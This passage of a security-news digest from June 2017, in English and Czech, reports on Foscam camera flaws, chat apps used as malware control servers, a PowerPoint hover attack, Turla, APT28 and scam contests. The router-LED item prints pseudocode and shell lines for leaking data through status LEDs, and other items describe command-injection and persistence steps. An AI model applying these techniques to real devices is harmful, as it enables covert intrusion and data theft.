F-Secure gives several example attacks against the products. For example, unauthenticated users able to access a specific port can use a command injection to add a new root user for the device and to enable a standard remote login service (Telnet). Then, when logging in through this remote login service, they have admin privileges on the device.

A second attack could take advantage of three of the individual vulnerabilities. "The empty password on the FTP user account can be used to log in," explains the F-Secure report. "The hidden Telnet functionality can then be activated. After this, the attacker can access the world-writable (non-restricted) file that controls which programs run on boot, and the attacker may add his own to the list. This allows the attacker persistent access, even if the device is rebooted. In fact, the attack requires the device to be rebooted, but there is a way to force a reboot as well."

Since there are no fixes yet available from Foscam, F-Secure recommends that users only install the cameras within a dedicated network or VLAN. In this case, it notes, changing the default password will not increase security since, "because of the Foscam IP cameras' use of hard-coded credentials, in this case an attacker can bypass unique credentials."

Remediation responsibility, however, remains with the manufacturer. F-Secure lists 12 recommendations for Foscam, ranging from the installation of "a truly random default administrative password" with a password sticker attached to the underside of the device, to the removal of built-in credentials and the implementation of a proper iptables firewall.

In general, F-Secure advises vendors to design security within their products from the beginning. "Having product security processes in place," says the report, "and investing even modest resources into security is a differentiator from competitors. This can also work to vendors' advantage when regulation enforces secure design practices."

Popular Chat Platforms Can Serve as C&C Servers: Researchers

8.6.2017 securityweek Virus
Popular chat platforms such as Slack, Discord and Telegram can be abused by malicious actors and turned into command and control (C&C) infrastructure, according to Trend Micro.

Threat actors have been very creative when it comes to C&C communications. Several groups have leveraged Twitter and the Russia-linked group known as Turla was recently spotted hiding the URLs of C&C servers in comments posted on Britney Spears’ Instagram account.

Researchers at Trend Micro have looked at several popular chat platforms and found that many of them can be abused by cybercriminals, and some of them already have. These applications are a tempting target for cybercriminals as they are often used for legitimate purposes, making it more difficult to detect malicious traffic.

Experts analyzed the team collaboration tool Slack, the gaming chat app Discord, the privacy-focused messenger Telegram, the group messaging platform HipChat, the open source Slack alternative Mattermost, Twitter, and Facebook.

The developers of such apps typically provide API components that allow integration with custom and third-party applications (e.g. syncing with the user’s calendar to get notifications on meetings directly in the chat interface).

In the case of Slack, researchers determined that the platform can be turned into a C&C server, but it’s not very practical for exfiltrating large amounts of data given that there is an upload limit of 5 GB.

Experts created a proof-of-concept (PoC) to demonstrate how Slack can be abused to send commands to a bot, including for listing directories, uploading files, executing system commands, and taking screenshots and uploading them to Slack.

Trend Micro has spotted some suspicious files interacting with Slack, but they did not include any malicious routines. Some malicious Android apps have been found to leverage Slack to relay information to attackers, but no threats have been observed abusing the platform to its full potential.

Discord is even less practical for exfiltrating data as the maximum size of file uploads is 8 MB. However, researchers did see malware hosted on the platform, including key generators, cracks, exploit kits and injectors. Discord has also been abused in cybercrime operations involving Bitcoin miners and malware that targets users of the online social gaming platform Roblox.

Telegram has also been abused by cybercriminals, despite the fact that, unlike Slack and Discord, it requires a valid phone number to register an account. A PoC created by Trend Micro for Telegram shows that the platform can be abused for executing commands on the infected system and stealing data. In the wild, Telegram has been leveraged by threats such as the TeleBot backdoor and the Telecrypt ransomware.

HipChat’s API also provides functionality needed for a C&C server, but researchers believe Mattermost is less appealing to attackers. Facebook can be abused, as experts from Zone13 recently demonstrated, but Trend Micro pointed out that the social media platform has good mechanisms in place for detecting suspicious activity on accounts.

Ne, Seznam.cz nerozdává iPhony 7. Nenechte se nachytat falešnou soutěží
7.6.2017 Živě.cz Podvod

Pokud narazíte na soutěž o iPhone 7, na jejíž stránkách najdete logo Seznam.cz, rozhodně se do ní nezapojujte. Jediným výsledkem totiž budou předražené prémiové SMSky, které z vás vysají minimálně pět stovek měsíčně. iPhone za to samozřejmě nedostanete.

Klepněte pro větší obrázek
Soutěž si můžete prohlédnout na webu appositewinner.faith, rozhodně se do ní ale nezapojujte

Celá „soutěž“ spočívá v opovězeni na čtyři otázky a vložení telefonního čísla. Pokud potom oběť potvrdí souhlas se soutěží odesláním SMS zprávy, budou jí doručovány prémiové zprávy, kdy cena jedné je 99 korun. Může to být jedna SMSka týdně, ale i několik denně. Rozhodně tedy může jít o drahý špás.

Šíří se podvodná kampaň lákající na slevy v supermarketech. Neklikejte na ni
Jak uvádí CSIRT, soutěž provozuje společnost DIMOCO, na kterou před pěti lety podal žalobu ČTÚ a aktuálně se jí pro tyto podvody zabývá také ČOI. Několik vln totožných soutěží jsme zaznamenali i během loňského roku a provozovatelům očividně stále fungují.

Rjabkov: USA za Obamy vyhrožovaly hackerskými útoky na ruskou infrastrukturu
7.6.2017 ČT24 BigBrother
Americké bezpečnostní složky za vlády prezidenta Baracka Obamy podle náměstka ruského ministra zahraničí Sergeje Rjabkova vyhrožovaly hackerskými útoky na infrastrukturu Ruska. Rjabkov to řekl na zasedání Rady federace, horní komory ruského parlamentu, napsala agentura TASS. Kdy přesně Američané Rusku vyhrožovali, Rjabkov ale neupřesnil.

Americký prezident Obama loni obvinil Rusko z hackerských útoků namířených proti Demokratické straně během prezidentské předvolební kampaně. Na zářijovém summitu G20 pak svému ruskému protějšku Vladimiru Putinovi řekl, že akce ruských hackerů nezůstanou bez odpovědi.

„Washington se s pomocí Pentagonu stal významným hráčem na trhu s programy, které umožňují hackerům snazší průnik do počítačových systémů. Přes média nám americké orgány během vlády Baracka Obamy vyhrožovaly, že pomocí těchto programů můžou kdykoliv způsobit masivní útoky na ruskou infrastrukturu,“ prohlásil Rjabkov.

Rjabkov také dodal, že Rusko se od roku 2015 nejednou snažilo navázat dvoustranné konzultace na téma boje s kybernetickými útoky. USA však podle něj neměly o iniciativu zájem.

V USA v současné době čtyři výbory Kongresu a FBI vyšetřují údajné ruské ovlivňování amerických prezidentských voleb, a to i hackerskými útoky. Kreml obvinění popírá s tím, že pro ně nejsou důkazy.

Beware! This Microsoft PowerPoint Hack Installs Malware Without Requiring Macros
7.6.2017 thehackernews Virus
"Disable macros and always be extra careful when you manually enable it while opening Microsoft Office Word documents."
You might have heard of above-mentioned security warning multiple times on the Internet as hackers usually leverage this decade old macros-based hacking technique to hack computers through specially crafted Microsoft Office files, particularly Word, attached to spam emails.
But a new social engineering attack has been discovered in the wild, which doesn't require users to enable macros; instead it executes malware on a targeted system using PowerShell commands embedded inside a PowerPoint (PPT) file.
Moreover, the malicious PowerShell code hidden inside the document triggers as soon as the victim moves/hovers a mouse over a link (as shown), which downloads an additional payload on the compromised machine -- even without clicking it.
Researchers at Security firm SentinelOne have discovered that a group of hackers is using malicious PowerPoint files to distribute 'Zusy,' a banking Trojan, also known as 'Tinba' (Tiny Banker).
Discovered in 2012, Zusy is a banking trojan that targets financial websites and has the ability to sniff network traffic and perform Man-in-The-Browser attacks in order to inject additional forms into legit banking sites, asking victims to share more crucial data such as credit card numbers, TANs, and authentication tokens.
"A new variant of a malware called 'Zusy' has been found in the wild spreading as a PowerPoint file attached to spam emails with titles like 'Purchase Order #130527' and 'Confirmation.' It's interesting because it doesn't require the user to enable macros to execute," researchers at SentinelOne Labs say in a blog post.
The PowerPoint files have been distributed through spam emails with subjects like "Purchase Order" and "Confirmation," which when opened, displays the text "Loading...Please Wait" as a hyperlink.

When a user hovers the mouse over the link it automatically tries to trigger the PowerShell code, but the Protected View security feature that comes enabled by default in most supported versions of Office, including Office 2013 and Office 2010, displays a severe warning and prompts them to enable or disable the content.
If the user neglects this warning and allows the content to be viewed, the malicious program will connect to the "cccn.nl" domain name, from where it downloads and executes a file, which is eventually responsible for the delivery of a new variant of the banking Trojan called Zusy.
"Users might still somehow enable external programs because they're lazy, in a hurry, or they're only used to blocking macros," SentinelOne Labs says. "Also, some configurations may possibly be more permissive in executing external programs than they are with macros."
Another security researcher, Ruben Daniel Dodge, also analyzed this new attack and confirmed that this newly discovered attack does not rely on Macros, Javascript or VBA for the execution method.
"This is accomplished by an element definition for a hover action. This hover action is setup to execute a program in PowerPoint once the user mouses over the text. In the resources definition of slide1 'rID2' is defined as a hyperlink where the target is a PowerShell command," Dodge said.
The security firm also said that the attack doesn't work if the malicious file is opened in PowerPoint Viewer, which refuses to execute the program. But the technique could still be efficient in some cases.

Cloud Security Firm Netskope Raises $100 Million

7.6.2017 securityweek IT

Netskope, a player in the cloud access security broker (CASB) market, announced on Tuesday that it has raised $100 million through an oversubscribed Series E funding round.

The investment brings the total raised by the Los Altos, California-based company to $231.4 million.

According to the company, the investment will fuel the advancement and go-to-market of its enterprise cloud security platform, which helps companies manage the security challenges introduced through the adoption of cloud services.

Netskope fundingThe company explains that its “Netskope Active Platform” was designed to provide context-aware governance of all cloud usage in the enterprise in real-time, whether accessed from the corporate network, remote, or from a mobile device.

“When we founded Netskope, we knew that the far-reaching impact of the cloud would require a fundamentally new approach to security. We started with CASB and now we’re expanding our cloud security platform to take on additional challenges,” Sanjay Beri, founder and CEO of Netskope, said in a statement.

Since the company launched in October 2013 it has grown its global employee headcount to more than 350.

The Series E round was led by existing investors Lightspeed Venture Partners and Accel. Previous investors Social Capital and Iconiq Capital also participated in the round, aling with new investors Sapphire Ventures and Geodesic Capital, the company said.

CASBs, which provide security and visibility for companies moving to the cloud, have experienced rapid growth, with several players in the space being acquired by larger enterprise technology firms.

In June 2016, Cisco announced its intention to acquire CloudLock, a privately held cloud CASB based in Waltham, Massachusetts for $293 million in cash and assumed equity awards. In 2015, Microsoft bought Adallom and turned it into its Cloud App Security service launched in April 2016. In 2014 Imperva bought Skyfence; in 2015, Palo Alto Networks bought CirroSecure; and in November 2015 Blue Coat (since acquired by Symantec) bought Elastica. In September 2016, Oracle acquired Palerra for an undisclosed amound. In February 2017, Forcepoint acquired Skyfence from Imperva.

Turla Malware Obtains C&C Address From Instagram Comments

7.6.2017 securityweek Virus
A piece of malware used in attacks by the Russia-linked cyberespionage group known as Turla is designed to obtain the address of its command and control (C&C) servers from comments posted to Instagram.

Turla is believed to have been active since at least 2007, but there is also some evidence linking the threat actor to one of the earliest cyberespionage operations. The group is also known as Waterbug, KRYPTON and Venomous Bear, and some of its primary tools are tracked as Turla (Snake and Uroburos) and Epic Turla (Wipbot and Tavdig).

The group is still active and it has been spotted developing new malware and improving its existing tools. The cyberspies have recently targeted the websites of ministries, embassies and other organizations from around the world in a reconnaissance campaign.

The security firm ESET has been monitoring this campaign and noticed that the hackers have once again started abusing social media.

The campaign has involved watering hole attacks, where the group planted malicious code on compromised websites in an effort to redirect their visitors to a server that delivered a JavaScript tool designed for profiling victims.

In one of the watering hole attacks, ESET came across a Firefox extension that acted as a backdoor. The extension appears to be an update to a similar tool previously analyzed by Bitdefender in its Pacifier APT report.

The malicious Firefox extension analyzed by ESET had been distributed through the website of a Swiss security company’s website. The malware is designed to collect information on the infected system, and it allows attackers to perform various tasks, including executing files, uploading and downloading files, and reading the content of a directory.

What makes this backdoor interesting is the way it obtains the address of its C&C server. The sample discovered by ESET generated a URL by looking for a specific comment posted to a photo on Britney Spears’ Instagram account.

The comment in question read “#2hot make loved to her, uupss #Hot #X,” which might not seem like something written by cyberspies. However, running a regular expression on the comment reveals a bit.ly URL that represents the backdoor’s C&C server.

Turla backdoor C&C hidden in instagram comments

The malicious extension knows which comment contains the C&C address by computing a custom hash value that must match 183. The bit.ly URL generated for the sample analyzed by ESET was only accessed 17 times, which could indicate that it was only part of a test.

On the other hand, researchers pointed out that some of the APIs used by the extension will no longer work in future Firefox releases, which means upcoming versions of the backdoor will have to be implemented differently.

Turla is not the only APT actor caught using social media for C&C communications. The group known as the Dukes were spotted leveraging Twitter a few years ago.

Illumio Raises $125 Million to Expand Adaptive Segmentation Business

7.6.2017 securityweek Security
Data center and cloud segmentation firm Illumio announced today that it has raised a further $125 million in a Series D funding round. This adds to the $100 million Series C financing raised in April 2015, and brings the firm's total funding to $267 million.

New and existing investors, including Andreessen Horowitz, General Catalyst, 8VC, Accel and Data Collective (DCVC) all participated -- buoyed by the firm's annualized bookings growth of 400 percent from the first to second year in market. Illumio's customers now include nine of the largest 15 financial companies in the U.S., and four of the top seven SaaS providers.

Illumio LogoThe new capital will be used to expand Illumio's global reach in field sales, marketing and customer support; and continuing R&D. The purpose, said Illumio in a statement today, is to "enable the company to accelerate its vision of making adaptive segmentation the foundation for cybersecurity in every enterprise data center and public cloud."

Segmentation is not a new security concept. In its most basic form, company computers are segmented from the public internet, and OT is segmented from IT, with firewalls. But as cyber attackers have become more sophisticated, and data center infrastructures more complex, the need for internal segmentation has grown. It is the most effective method for containing the insider threat, and for preventing the lateral movement of attackers who breach the firewall perimeter defense.

Indeed, segmentation is increasingly required for compliance and regulations. For example, PCI DSS v3.2 (1.3.6) states, "Place system components that store cardholder data (such as a database) in an internal network zone, segregated from the DMZ and other untrusted networks." Such requirements are only likely to increase both as part of compliance and as a means of demonstrating best security practices to regulators.

"Given the exponential growth of cybersecurity risks, it's clear that segmentation is now one of the largest market opportunities in enterprise software," said Larry Unrein, Global Head of J.P. Morgan Asset Management's Private Equity Group.

But the traditional methods for segmentation -- firewalls and router-enforced zoning -- are difficult, complex and expensive in modern dynamic data centers and public clouds. This is the market and approach that Illumio seeks to disrupt. Rather than imposing rules on separate routers and firewalls around the infrastructure, Illumio provides a platform that invokes the inherent security already available within individual devices.

The segmentation is controlled and enforced from a central policy compute engine (PCE) that activates and manages the enforcement capabilities in existing assets. It doesn't require additional hardware or software that add complexity, become performance chokepoints, and increase costs. Illumio's approach is to allow the right degree of segmentation to precisely where it is needed: a granular and adaptive method.

Using this approach, Morgan Stanley reduced its firewall rules by 90 percent with Illumio, while another customer has reduced 15,000 firewall rules to 40 security policies -- all defined in, contained in, and controlled by the PCE.

"The security segmentation market is already a multi-billion-dollar opportunity," said Andrew Rubin, CEO and co-founder of Illumio; "and Illumio's traction with customers such as Salesforce, Morgan Stanley and Workday demonstrates that the Illumio Adaptive Security Platform can solve these challenges at scale. Illumio is uniquely suited to address the needs of large and small organizations as they shift focus away from the perimeter and towards having complete visibility and control inside the data center and cloud compute environments."

Russia-linked hacker group APT28 continues to target Montenegro
7.6.2017 securityaffairs APT

Once again, Montenegro was targeted by the Russia-linked hacker group APT28, according to the experts it is just the beginning.
On June 5 Montenegro officially joined NATO alliance despite the strong opposition from Russian Government that threatened to retaliate.

Cybersecurity experts believe that a new wave of attacks from the cyberspace will hit the state. In February, for the second time in a few months, Montenegro suffered massive and prolonged cyberattacks against government and media websites.

Researchers at security firm FireEye who analyzed the attacks observed malware and exploits associated with the notorious Russia-linked APT group known as APT28 (aka Fancy Bear, Pawn Storm, Strontium, Sofacy, Sednit, and Tsar Team).

Another massive attack hit the country’s institutions during October elections, amid speculation that the Russian Government was involved.

In the last string of attacks, hackers targeted Montenegro with spear phishing attacks, the malicious messages used weaponized documents pertaining to a NATO secretary meeting and a visit by a European army unit to Montenegro.

The hackers delivered the GAMEFISH backdoor (aka Sednit, Seduploader, JHUHUGIT and Sofacy), a malware that was used only by the APT28 group in past attacks.

According to FireEye, the documents delivered the backdoor via a Flash exploit framework dubbed DealersChoice.

“NATO expansion is often viewed as a security threat by the Russian Federation, and Montenegro’s bid for membership was strongly contested by Russia and the pro-Russia political parties in Montenegro,” Tony Cole, vice president and chief technology officer for global government at FireEye, told journalists today.” reportedEl Reg.

“It’s likely that this activity is a part of APT28’s continued focus on targeting various NATO member states, as well as the organization itself. Russia has strongly opposed Montenegro’s NATO accession process and is likely to continue using cyber capabilities to undermine Montenegro’s smooth integration into the alliance,”

The bait documents first gather information of the target system in an effort to determine which version of Flash Player it is running on the machine, then it connects the C&C server to receive the appropriate Flash exploit. The exploits used in the attacks include the code to trigger the CVE-2015-7645 and CVE-2016-7855, are used to deliver GAMEFISH.

At the time I’m writing there is no news about the specific targets of the campaign neither is the attacks were successful.

Clearly, APT28’s and other Russian linked APT will continue to target the country such as other NATO member states.

Philippine Bank Chaos as Money Goes Missing From Accounts

7.6.2017 securityweek CyberCrime
A major Philippine bank shut down online transactions and cash machines on Wednesday after money went missing from accounts, triggering fears it had been hacked even as company officials said it was an internal computer error.

Customers of Bank of the Philippine Islands (BPI) were shocked on Wednesday morning to see unauthorized withdrawals and deposits from their accounts.

BPI said in a statement the problem was caused by an "internal data processing error" that had been identified.

But it had to close its automatic teller machines (ATMs) and told its eight million customers they could not do online transactions on Wednesday as the bank scrambled to fix the problem.

"Please do not panic... we will make sure that your money is there," BPI senior vice president Cathy Santamaria said at a news conference as social media lit up with complaints from customers about missing money and inconvenience.

Efforts to fix the problem were "progressing well" and the glitch was expected to be resolved within the day, the bank added in a statement, although it did not explain why the glitch occurred.

There has been global concern about hacking following the world's biggest ransomware attack last month that struck hundreds of thousands of computers worldwide.

Nestor Espenilla, the incoming governor of the Bangko Sentral ng Pilipinas, the country's central bank, said they had accepted "for now" BPI's explanation that no hacking was involved, but would still conduct its own probe.

"We have no reason to believe otherwise at this point of time, but as I said this is standard operating procedure, we always verify every incident that we are aware of," Espenilla said in a radio interview.

"For now I think it's important that BPI resolves it as quickly as possible. We take their assurance that this is not a hack and no money will be lost."

- 'Lost confidence' -

The bank said the error had led to some transactions between April 27 and May 2 to be "double posted" from Tuesday.

Santamaria said she did not know how many of the 166-year-old bank's customers were affected by the glitch.

She assured customers they had not lost money and their account balances would be fixed once the glitch was fixed.

But customers were unhappy and confused.

Yumi Sanpei-Angeles, 29, who had 15,500 pesos ($313) withdrawn from her account, told AFP she was considering switching banks, with her frustration at missing money compounded by not being able to check her account online.

"I've lost confidence in BPI's system," said Sanpei-Angeles, a corporate brand specialist, adding other people had been inconvenienced more than her.

"We have friends who needed the money today to pay for tuition. Another friend is travelling and cannot withdraw money via ATM. Such a huge hassle for customers because of the company's negligence."

Marjorie del Rosario, 27, said her two accounts with BPI were affected -- one had a negative balance because of an unauthorised withdrawal and the other had 40 pesos (80 cents) added.

"Almost all of us in our office were affected, from hundreds to six-digit figures lost from our accounts," she told AFP.

Other customers vented their frustrations through social media.

"I had 3 unauthorize atm withdrawals! What the heck! I don't have any money left on my Personal acct!!" a customer named Belle tweeted.

A user called wild flower wrote: "I lost my money... I only have 15 pesos (30 US cents) left on my pocket. How can I go home? Fix it please."

BPI's Santamaria was also forced to warn clients against posting personal bank account information online, noting that some had posted their private data on Facebook apparently to show what had happened.

"Please be vigilant. You also have a role to play in your personal safety," she said.

She also appealed for honesty from clients whose accounts had funds deposited.

Russian Hackers 'Planted False Story' Behind Mideast Crisis

7.6.2017 securityweek BigBrothers
US intelligence officials believe Russian hackers planted a false news story that led Saudi Arabia and several allies to sever relations with Qatar, prompting a diplomatic crisis, CNN reported Tuesday.

FBI experts visited Qatar in late May to analyze an alleged cyber breach that saw the hackers place the fake story with Qatar's state news agency, the US broadcaster said.

Saudi Arabia then cited the false item as part of its reason for instituting a diplomatic and economic blockade against Qatar, the report said.

Qatar's government said the May 23 news report attributed false remarks to the emirate's ruler that appeared friendly to Iran and Israel, and questioned whether US President Donald Trump would last in office, according to CNN.

Qatari Foreign Minister Sheikh Mohammed Bin Abdulrahman al-Thani told the broadcaster that the FBI has confirmed the hack and the planting of fake news.

"Whatever has been thrown as an accusation is all based on misinformation and we think that the entire crisis is being based on misinformation," he told CNN.

"It was started based on fabricated news, being wedged and being inserted in our national news agency, which was hacked and proved by the FBI," he added.

If accurate, the allegations would indicate Russian efforts to undermine US foreign policy, building on US intelligence concerns that Russian hackers attempted to influence last year's presidential election, won by Trump. The Kremlin denies meddling.

Saudi Arabia, Egypt, the United Arab Emirates and Bahrain announced Monday they were severing diplomatic relations and closing air, sea and land links with Qatar.

They accused the tiny Gulf state of harboring extremist groups and suggested Qatari support for the agenda of Saudi Arabia's regional archrival Iran. Qatar has strenuously denied the allegations.

Although Qatar hosts the largest American military airbase in the Middle East, Trump threw his weight behind the Saudi-led effort to isolate the emirate in a surprise move on Tuesday.

He suggested Qatar was funding extremism.

"So good to see the Saudi Arabia visit with the King and 50 countries already paying off," he tweeted in reference to his trip to Riyadh last month.

"They said they would take a hard line on funding... extremism, and all reference was pointing to Qatar. Perhaps this will be the beginning of the end to the horror of terrorism!"

The CNN report quoted the Qatari government communications office as saying it was working with the FBI and Britain's National Crime Agency on an ongoing hacking investigation.

Exfiltrating data from Air-Gapped Networks via Router LEDs
7.6.2017 securityaffairs Virus

A team of Israeli researchers has devised a new technique to exfiltrate data from a machine by using a malware that controls router LEDs.
A few months ago a group of researchers from Israeli Ben-Gurion University devised a new technique to exfiltrate data from a machine by using a malware that controls hard drive LEDs, now researchers applied the technique to routers.

The attack is very insidious because hacking a router it is possible to gain control over the entire network, for this reason, the researchers focused their efforts in stealing admin credentials of the device.

The team of experts led by the expert Mordechai Guri developed a specific firmware dubbed xLED that allowed them to control the LED while the router is working.

Alternatively, the group demonstrated how to force the router executing a malicious script to control the LED.

“In this paper, we show how attackers can covertly leak data (e.g., encryption keys, passwords and files) from highly secure or air-gapped networks via the row of status LEDs that exists in networking equipment such as LAN switches and routers. Although it is known that some network equipment emanates optical signals correlated with the information being processed by the device (‘side-channel’), intentionally controlling the status LEDs to carry any type of data (‘covert-channel’) has never studied before.” reads the paper published by the experts. “A malicious code is executed on the LAN switch or router, allowing full control of the status LEDs. Sensitive data can be encoded and modulated over the blinking of the LEDs. The generated signals can then be recorded by various types of remote cameras and optical sensors.”

The experts demonstrated that using a normal camera (managing LED blinks at 120 bits/second) it is possible to exfiltrate data at a rate that is limited to less than 1 Kbps, but using a GoPro Hero5 it is possible to increase the efficiency of the technique managing LED blinks at 960 bits/second.

If the attacker has physical access to the target’s facility, they can use an optical sensor (Guri’s group used a Thorlabs PDA100A) that can reach more than 1 Kbps and as high as 3.5 Kbps.

Exfiltrating data router leds

Below a portion of code used for the modulation of the signal sent through the status LEDs that can be captured by the attackers with a remote camera of an optical sensor:

Algorithm 1 ModulateOOK
1: procedure ModulateOOK(nLED, data, T)
2: openLED(nLED); //opens the LED file for writing
3: while(data[i] !=0)
4: if(data[i] == ‘0’) //modulate 0 by turning the LED off
5: setLEDOff(nLED);
6: if(data[i] == ‘1’) //modulate 1 by turning the LED on
7: setLEDOn(nLED);
8: i++;
9: sleep(T); // sleep for time period of T
10: closeLED(nLED); // closes the LED file descriptor
below the shellscript released by the experts:

// Method #1
// turn the LED on
1: echo 0 > /sys/class/leds/led_name/brightness
// turn the LED off
2: echo 255 > /sys/class/leds/led_name/brightness
// Method #2
3: echo 1 > /proc/gpio/X_out // turn the LED on
4: echo 0 > /proc/gpio/X_out // turn LED off
The researchers also shared a proof-of-concept video of the attack:

To prevent this kind of attack the best option for the user it to put a tape over the LEDs, and to check the firmware running his/her router.

4 Possible Ways to Make Your Browser Hacker-Proof
7.6.2017 securityaffairs Safety

Browsers are constantly targeted by hackers. Here are 4 ways you can make your browser hacker-proof. Use them to stay secure on the web.
Browsers have long been a hot target of numerous hacking-related incidents. They are the primary source of hacking incidents as we search, share, watch and download files from browsers. Moreover, various vulnerabilities exists in browsers, emphasizing the fact of using necessary tools to make your browser hacker-proof.

Ensuring that browsers are secured with the essential protocols is important. After all, hackers are becoming exceedingly experienced, penetrating into numerous prominent companies and government agencies this year alone as witnessed from the WannaCry ransomware cyberattack.

Although web browsers do a good job at ensuring security loopholes are rectified as early as possible, but more often than not, some updates arrive late and you can’t rely on them alone. It could be that your browser isn’t updating or you’ve got extensions and plugins installed that have potential security loopholes.

To ensure your online safety, we’ve come up with four online security tips that will help keep your browser safe hackers.

Keep Your Browser Up-to-Date
Keeping your browser updated is the easiest way to ensure the safety of your browser. Browser updates carry necessary patches which secure you against hacking incidents and make your browser hack-proof on the web.

Google Chrome, Firefox and Opera come packed with default settings for automatic updates. You need to click the ‘install updates automatically’ option for uninterrupted and smooth connectivity.

browser hacker-proof

Fortunately, most browsers these days are automatically updated. For instance, if you installed Microsoft’s new Windows 10 operating system, its default setting is to automatically update your software and issue patches, including for its Edge browser.

Uninstall Unnecessary Plug-ins
No matter how secure your browser might get, third-party plug-ins can never be completely trusted as plug-ins can read, make changes and access the websites you visit.

There are some plug-ins that come with the browser and might never be used. So, one way to give yourself an extra layer of protection is to delete unneeded plug-ins.

Disable Unnecessary Browser Extensions
There is a misconception regarding plug-ins and extensions. While plug-ins handle video or other content that the browser does not support, extensions are small programs that add new features to your browser and personalize your browsing experience.

You can find numerous extensions on Google Chrome and Firefox which enhance your online browsing functionality. Having said that, extensions have their disadvantages. Some extensions need passwords so they can work to their full potential. That leaves an open door to hackers and other cyber criminals who install malware.

While installing an extension, be mindful of the source – trustworthiness of the maker. You can read reviews for authenticity.

Use VPN Extension
When it comes to making your browser hack-proof, no other tool does it better than a VPN extension. This extension promises fast speed internet capability and does not maintain any logs of its users. In addition, you can evade censorship laws in any country by connecting to a server maintained in another country – all while being anonymous on the web.

There are numerous extensions that provide strong features needed to make the browser hacker-proof such as blocking ads, dodging online trackers, safeguarding against malware & providing WebRTC leak protection. With a Chrome VPN extension, you get an encrypted connection which masks your physical IP with a virtual IP – maintaining your online secrecy.

Ke sporům arabských zemí s Katarem přispěli ruští hackeři, uvedla CNN

7.6.2017 Novinky/Bezpečnost BigBrother
Představitelé amerických tajných služeb jsou podle CNN přesvědčeni, že ruští hackeři rozšířili falešné zprávy, které vedly k tomu, že Saúdská Arábie a některé další arabské země přerušily diplomatické vztahy s Katarem. Cílem Ruska podle americké rozvědky zřejmě bylo vyvolat neshody mezi USA a jejich spojenci. Kreml to v reakci odmítl s tím, že o pirátském útoku proti Kataru nejsou žádné důkazy.
Stávající roztržka mezi blízkovýchodními ropnými velmocemi vznikla poté, co se v květnu na stránkách katarské oficiální tiskové agentury objevila kontroverzní prohlášení, která prý pronesl vládnoucí emír šajch Tamim bin Hamad bin Chalífa Sání.

Ten údajně vyjádřil pochopení pro palestinské radikální hnutí Hamás a libanonské radikální hnutí Hizballáh a řekl, že Írán je „islámská velmoc, kterou nelze ignorovat a ke které není rozumné se chovat nepřátelsky”. Katar následně oznámil, že stránky jeho tiskové agentury napadli hackeři.

V pondělí pak Saúdská Arábie, Egypt, Bahrajn, Spojené arabské emiráty a některé další státy přerušily s Katarem diplomatické vztahy. Jako důvod uvedly, že Katar podporuje teroristické a sektářské skupiny, jako je Islámský stát, Al-Káida a Muslimské bratrstvo, a šíří prostřednictvím médií jejich ideologii.

Katar podle nich rovněž financuje radikální skupiny napojené na šíitský Írán, který je regionálním rivalem sunnitské Saúdské Arábie. Zmíněné země rovněž sdělily, že přerušují pozemní, letecké i námořní spojení s Katarem.

Katar má vazby na palestinský Hamás a v jeho hlavním města Dauhá sídlí politická odnož Tálibánu.

Už nás to unavuje, ozvali se Rusové
Experti amerického Federálního úřadu pro vyšetřování (FBI) navštívili Katar koncem května, aby údajný kybernetický útok prošetřili, napsal server CNN. Katarský ministr zahraničí šajch Muhammad bin Abdar Rahmán Sání CNN řekl, že FBI hackerský útok a publikaci falešných zpráv potvrdil.

BEZ KOMENTÁŘE: Saúdská Arábie uzavřela hraniční přechod pro silniční dopravu s Katarem
Kreml tato obvinění ve středu odmítl s tím, že pro ně nejsou žádné důkazy. „Už nás unavuje reagovat na taková obvinění bez důkazů. Tato obvinění ve skutečnosti diskreditují ty, kdo je vznášejí," prohlásil podle agentury AFP poradce ruského prezidenta Vladimira Putina pro kybernetickou bezpečnost.

Kaspersky Lab podal antimonopolní stížnost na Microsoft. Prý zvýhodňuje svůj antivir
7.6.2017 Živě.cz Security
Kaspersky Lab na svém blogu dokazuje, jak Microsoft nabádá uživatele, aby nepoužívali nic jiného než Windows Defender Kaspersky Lab na svém blogu dokazuje, jak Microsoft nabádá uživatele, aby nepoužívali nic jiného než Windows Defender Kaspersky Lab na svém blogu dokazuje, jak Microsoft nabádá uživatele, aby nepoužívali nic jiného než Windows Defender Kaspersky Lab na svém blogu dokazuje, jak Microsoft nabádá uživatele, aby nepoužívali nic jiného než Windows Defender Kaspersky Lab na svém blogu dokazuje, jak Microsoft nabádá uživatele, aby nepoužívali nic jiného než Windows Defender 6 FOTOGRAFIÍ
zobrazit galerii
Ruský výrobce antivirů Kaspersky Lab podal antimonopolní stížnost na Microsoft. Nejprve tak udělal u ruského antimonopolního úřadu FAS, kterému tvrdil, že Microsoft zneužívá u Windows 10 svoji dominantní pozici k upřednostňování svého antivirového softwaru oproti konkurenci. Microsoft na to zareagoval určitými změnami, které ale Kaspersky Lab nestačily, a tak firma podala stížnost Evropské komisi.
Kaspersky Lab vyvinula nový operační systém - KasperskyOS
„Microsoft jasně zneužívá svoji dominantní pozici na poli počítačových operačních systému, aby zpropagoval svůj vlastní bezpečnostní software Windows Defender, a to takovým způsobem, že uživatel je nabádán opustit své předchozí bezpečnostní řešení,“ píše na blogu společnosti Eugene Kaspersky, spoluzakladatel společnosti.

Firma tvrdí, že Microsoft zachází tak daleko, že uživatelům při přechodu na Windows 10 jejich software maže a automaticky zavede jako ochranu Windows Defender. Kaspersky Lab také vadí, že Microsoft neposkytuje u každé nové aktualizace Windows 10 dostatečně dlouhý časový úsek, aby mohla společnost vyzkoušet, jak její produkty fungují.

Microsoft se v posledních letech na Windows Defender skutečně zaměřil a vylepšoval ho. U Windows 10 jej společnost zabudovala do systému jako výchozí antivirové řešení. Americká společnost tvrdí, že tak dělá proto, aby uživatele ochránila, ale podle Kaspersky Lab se jedná o antimonopolní chování. „Chceme, aby Microsoft přestal klamat naše – nejen naše – uživatele,“ stojí dále v příspěvku na blogu. „Všechna bezpečnostní řešení by na Windows 10 měla mít stejné příležitosti.“

Microsoft se domnívá, že Windows 10 žádná pravidla neporušuje. „Věříme, že bezpečnostní funkce Windows 10 se shodují s pravidly hospodářské soutěže. Na všechny otázky odpovíme,“ řekla společnost v prohlášení serveru The Verge. Nabídla také Kaspersky Lab, že se s nimi sejde a společně najdou řešení.

Nejrozšířenějším kybernetickým hrozbám kraluje virus Danger

7.6.2017 Novinky/Bezpečnost Viry
